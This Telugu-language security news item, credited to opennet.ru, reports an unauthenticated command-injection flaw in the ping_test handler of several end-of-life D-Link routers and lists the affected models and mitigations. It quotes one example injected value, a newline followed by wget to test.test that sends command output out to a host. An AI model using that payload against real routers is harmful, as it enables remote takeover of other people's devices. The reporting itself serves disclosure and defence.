డి-లింక్ వైర్లెస్ రౌటర్లలో ప్రమాదకరమైన దుర్బలత్వం (), ఇది "ping_test" హ్యాండ్లర్కు ప్రత్యేక అభ్యర్థనను పంపడం ద్వారా పరికరం వైపు కోడ్ని రిమోట్గా అమలు చేయడానికి మిమ్మల్ని అనుమతిస్తుంది, ప్రామాణీకరణ లేకుండా యాక్సెస్ చేయవచ్చు.
ఆసక్తికరంగా, ఫర్మ్వేర్ డెవలపర్ల ప్రకారం, "ping_test" కాల్ ప్రామాణీకరణ తర్వాత మాత్రమే అమలు చేయబడాలి, అయితే వాస్తవానికి ఇది వెబ్ ఇంటర్ఫేస్లోకి లాగిన్ అయినప్పటికీ, ఏ సందర్భంలోనైనా పిలువబడుతుంది. ప్రత్యేకించి, apply_sec.cgi స్క్రిప్ట్ని యాక్సెస్ చేస్తున్నప్పుడు మరియు “action=ping_test” పరామితిని పాస్ చేస్తున్నప్పుడు, స్క్రిప్ట్ ప్రమాణీకరణ పేజీకి దారి మళ్లిస్తుంది, కానీ అదే సమయంలో ping_testతో అనుబంధించబడిన చర్యను నిర్వహిస్తుంది. కోడ్ని అమలు చేయడానికి, ping_test లోనే మరొక దుర్బలత్వం ఉపయోగించబడింది, ఇది పరీక్ష కోసం పంపబడిన IP చిరునామా యొక్క ఖచ్చితత్వాన్ని సరిగ్గా తనిఖీ చేయకుండా పింగ్ యుటిలిటీని పిలుస్తుంది. ఉదాహరణకు, wget యుటిలిటీకి కాల్ చేయడానికి మరియు “echo 1234” కమాండ్ ఫలితాలను బాహ్య హోస్ట్కు బదిలీ చేయడానికి, “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// అనే పరామితిని పేర్కొనండి. test.test/?$( echo 1234)".
దుర్బలత్వం యొక్క ఉనికి క్రింది నమూనాలలో అధికారికంగా నిర్ధారించబడింది:
- DIR-655 ఫర్మ్వేర్ 3.02b05 లేదా అంతకంటే పాతది;
- DIR-866L ఫర్మ్వేర్ 1.03b04 లేదా అంతకంటే పాతది;
- DIR-1565 ఫర్మ్వేర్ 1.01 లేదా అంతకంటే పాతది;
- DIR-652 (సమస్యాత్మక ఫర్మ్వేర్ సంస్కరణల గురించి సమాచారం అందించబడలేదు)
ఈ మోడల్లకు మద్దతు వ్యవధి ఇప్పటికే గడువు ముగిసింది, కాబట్టి D-Link , ఇది దుర్బలత్వాన్ని తొలగించడానికి వారి కోసం నవీకరణలను విడుదల చేయదు, వాటిని ఉపయోగించమని సిఫార్సు చేయదు మరియు వాటిని కొత్త పరికరాలతో భర్తీ చేయమని సలహా ఇస్తుంది. భద్రతా పరిష్కారంగా, మీరు వెబ్ ఇంటర్ఫేస్కు ప్రాప్యతను విశ్వసనీయ IP చిరునామాలకు మాత్రమే పరిమితం చేయవచ్చు.
ఆ దుర్బలత్వం కూడా ఉందని తర్వాత తెలిసింది మోడల్లు DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 మరియు DIR-825, వీటికి సంబంధించిన అప్డేట్లను విడుదల చేసే ప్రణాళికలు ఇంకా తెలియరాలేదు.
మూలం: opennet.ru